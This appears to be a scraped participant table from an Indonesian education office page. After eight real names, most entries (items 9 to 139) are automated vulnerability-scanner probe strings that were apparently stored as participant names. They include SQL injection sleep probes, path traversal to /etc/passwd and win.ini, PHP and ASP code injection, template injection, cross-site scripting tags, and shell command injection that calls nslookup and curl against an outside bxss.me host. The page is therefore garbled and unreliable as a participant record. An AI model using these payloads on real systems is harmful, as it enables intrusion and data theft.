| # | Unit Kerja | Peserta | Keterangan |
|---|---|---|---|
| 1 | Dinas Pendidikan dan Kebudayaan |
1. ARFAN LUWITI, M.Ap 2. SURYAN GANI, A.Md 3. YAYUNDA PAKAYA, S.E 4. MARSELA KASIM, S.Pt 5. STELA PAKADJI, S.E 6. FAZRAN AYU LESTARI S. TIULUNGO, S.Pd 7. SRI WILIN NEY, S.E 8. OO SUHRODI, S.Sos 9. 1 10. 1tlStYcBv 11. -1 OR 5*5=25 -- 12. -1 OR 5*5=25 13. -1' OR 5*5=25 -- 14. -1" OR 5*5=25 -- 15. -1' OR 5*5=25 or '6uK8Ehk1'=' 16. -1" OR 5*5=25 or "x0L8Ltgf"=" 17. 1*if(now()=sysdate(),sleep(15),0) 18. 10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z 19. 10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z 20. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 21. 1-1; waitfor delay '0:0:15' -- 22. 1-1); waitfor delay '0:0:15' -- 23. 1-1)); waitfor delay '0:0:15' -- 24. 1-1 waitfor delay '0:0:15' -- 25. 1ldVfZr3T'; waitfor delay '0:0:15' -- 26. 1n3UClLEv'); waitfor delay '0:0:15' -- 27. 14oiNaTB5')); waitfor delay '0:0:15' -- 28. 1-1 OR 87=(SELECT 87 FROM PG_SLEEP(15))-- 29. 1-1) OR 665=(SELECT 665 FROM PG_SLEEP(15))-- 30. 1-1)) OR 209=(SELECT 209 FROM PG_SLEEP(15))-- 31. 1npvhefym' OR 784=(SELECT 784 FROM PG_SLEEP(15))-- 32. 1BJ9yLLMG') OR 497=(SELECT 497 FROM PG_SLEEP(15))-- 33. 1WrzJqBnu')) OR 116=(SELECT 116 FROM PG_SLEEP(15))-- 34. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 35. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 36. (select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual) 37. 1'" 38. ${9999620+9999571} 39. redirtest.acx 40. '.gethostbyname(lc('hitlz'.'vowxbptbfba3d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(82).chr(118).chr(69).' 41. ".gethostbyname(lc("hitst"."dkyfvauh97460.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(117).chr(90)." 42. gethostbyname(lc('hitgm'.'imjyepbj65f60.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(81).chr(113).chr(66) 43. 1&n980487=v941292 44. 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 45. ) 46. !(()&&!|*|*| 47. ^(#$!@#$)(()))****** 48. 1<esi:include src="http://bxss.me/rpb.png"/> 49. ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 50. xfs.bxss.me 51. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 52. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 53. /etc/shells 54. ../../../../../../../../../../../../../../etc/shells 55. ../../../../../../../../../../../../../../etc/passwd 56. '" 57. c:/windows/win.ini 58. ../../../../../../../../../../../../../../windows/win.ini 59. <!-- 60. bxss.me 61. file:///etc/passwd 62. Http://bxss.me/t/fit.txt 63. http://bxss.me/t/fit.txt%3F.jpg 64. ../1 65. HttP://bxss.me/t/xss.html?%00 66. bxss.me/t/xss.html?%00 67. http://bxss.me/t/rfi.php?%00 68. bxss.me/t/rfi.php?%00 69. "+"A".concat(70-3).concat(22*4).concat(119).concat(80).concat(100).concat(74)+(require"socket" Socket.gethostbyname("hitfo"+"qyzmvrbwdaf80.bxss.me.")[3].to_s)+" 70. '+'A'.concat(70-3).concat(22*4).concat(111).concat(66).concat(110).concat(77)+(require'socket' Socket.gethostbyname('hitae'+'sluafefa98e09.bxss.me.')[3].to_s)+' 71. 'A'.concat(70-3).concat(22*4).concat(98).concat(68).concat(99).concat(88)+(require'socket' Socket.gethostbyname('hitkl'+'mqppwfyb507f2.bxss.me.')[3].to_s) 72. /../../../../../../../../../../windows/system32/BITSADMIN.exe 73. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 74. ';print(md5(31337));$a=' 75. ";print(md5(31337));$a=" 76. ${@print(md5(31337))} 77. ${@print(md5(31337))}\ 78. '.print(md5(31337)).' 79. response.write(9588705*9569421) 80. <?php print(md5(31337));?> 81. '+response.write(9588705*9569421)+' 82. '{${print(md5(31337))}}' 83. print(md5(31337));// 84. "+response.write(9588705*9569421)+" 85. {php}print(md5(31337));{/php} 86. <% response.write(9588705*9569421) %> 87. [php]print(md5(31337));[/php] 88. +response.write(9588705*9569421)' 89. df9XWvYK 90. 8Bht9hEm: EAx0gMpr 91. '"() 92. 1'&&sleep(27*1000)*svgufa&&' 93. 1"&&sleep(27*1000)*rqcrer&&" 94. 1'||sleep(27*1000)*reprsv||' 95. 1'"()&%<zzz><ScRiPt >znHo(9746)</ScRiPt> 96. 1"||sleep(27*1000)*mqgxjl||" 97. '"()&%<zzz><ScRiPt >znHo(9609)</ScRiPt> 98. 19228403 99. bfg10359%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10359 100. bfgx2432%C0%BEz1%C0%BCz2a%90bcxhjl2432 101. <%={{={@{#{${dfb}}%> 102. <th:t="${dfb}#foreach 103. 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 104. dfb{{98991*97996}}xca 105. dfb[[${98991*97996}]]xca 106. dfb__${98991*97996}__::.x 107. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 108. bfg3435%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3435 109. bfgx4157%C0%BEz1%C0%BCz2a%90bcxhjl4157 110. 1%22onmouseover=znHo(99972)%22 111. echo tlqakd$()\ hydajr\nz^xyu||a #' &echo tlqakd$()\ hydajr\nz^xyu||a #|" &echo tlqakd$()\ hydajr\nz^xyu||a # 112. 1"onmouseover=znHo(96392)" 113. &echo zigbaa$()\ rphzol\nz^xyu||a #' &echo zigbaa$()\ rphzol\nz^xyu||a #|" &echo zigbaa$()\ rphzol\nz^xyu||a # 114. 1&echo cgaotj$()\ tszezg\nz^xyu||a #' &echo cgaotj$()\ tszezg\nz^xyu||a #|" &echo cgaotj$()\ tszezg\nz^xyu||a # 115. 1" zswP=znHo([!+!]) FwV=" 116. |echo njvlpb$()\ qwfcoa\nz^xyu||a #' |echo njvlpb$()\ qwfcoa\nz^xyu||a #|" |echo njvlpb$()\ qwfcoa\nz^xyu||a # 117. 1|echo gvkzec$()\ epjuml\nz^xyu||a #' |echo gvkzec$()\ epjuml\nz^xyu||a #|" |echo gvkzec$()\ epjuml\nz^xyu||a # 118. 1\u0022onmouseover=znHo(93963)\u0022 119. expr 9000689827 - 920541 120. (nslookup -q=cname hitddgqqffspm24d39.bxss.me||curl hitddgqqffspm24d39.bxss.me)) 121. %31%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%7A%6E%48%6F%28%39%31%30%39%34%29%22 122. $(nslookup -q=cname hitafkjjloxal17bff.bxss.me||curl hitafkjjloxal17bff.bxss.me) 123. &nslookup -q=cname hithxvywxywnt304a5.bxss.me&'\"`0&nslookup -q=cname hithxvywxywnt304a5.bxss.me&`' 124. &(nslookup -q=cname hitqrjvvosbalb012b.bxss.me||curl hitqrjvvosbalb012b.bxss.me)&'\"`0&(nslookup -q=cname hitqrjvvosbalb012b.bxss.me||curl hitqrjvvosbalb012b.bxss.me)&`' 125. |(nslookup -q=cname hitdylbohnqdx777fd.bxss.me||curl hitdylbohnqdx777fd.bxss.me) 126. `(nslookup -q=cname hitdacajycifrece84.bxss.me||curl hitdacajycifrece84.bxss.me)` 127. ;(nslookup -q=cname hitzukcmupfmaef41d.bxss.me||curl hitzukcmupfmaef41d.bxss.me)|(nslookup -q=cname hitzukcmupfmaef41d.bxss.me||curl hitzukcmupfmaef41d.bxss.me)&(nslookup -q=cname hitzukcmupfmaef41d.bxss.me||curl hitzukcmupfmaef41d.bxss.me) 128. 1"sTYLe='zzz:Expre/**/SSion(znHo(9490))'bad=" 129. |(nslookup${IFS}-q${IFS}cname${IFS}hitnoollloyjjd08f7.bxss.me||curl${IFS}hitnoollloyjjd08f7.bxss.me) 130. &(nslookup${IFS}-q${IFS}cname${IFS}hiteznufsbepw1cd20.bxss.me||curl${IFS}hiteznufsbepw1cd20.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hiteznufsbepw1cd20.bxss.me||curl${IFS}hiteznufsbepw1cd20.bxss.me)&`' 131. 1"><script>znHo(9032)</script> 132. 1<ScRiPt >znHo(9105)</ScRiPt> 133. 1<WANLFZ>YXPGA[!+!]</WANLFZ> 134. 1<script>znHo(9241)</script> 135. 1<script>znHo(9679)</script>9679 136. 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%7A%6E%48%6F%28%39%36%32%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 137. 1<ScRiPt >znHo(9993)</ScRiPt> 138. 1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9985></ScRiPt> 139. 1< |